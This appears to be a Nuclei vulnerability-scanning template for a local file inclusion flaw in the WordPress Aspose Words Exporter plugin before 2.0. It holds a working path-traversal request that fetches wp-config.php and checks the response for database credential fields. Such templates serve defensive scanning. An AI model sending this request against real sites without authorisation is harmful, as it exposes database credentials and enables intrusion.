id: aspose-words-file-download

info:
  name: WordPress Aspose Words Exporter <2.0 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: WordPress Aspose Words Exporter prior to version 2.0 is vulnerable to local file inclusion.
  reference:
    - https://wpscan.com/vulnerability/7869
    - https://wordpress.org/plugins/aspose-doc-exporter
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: wordpress,wp-plugin,lfi,aspose

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        part: body
        condition: and

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/08/01
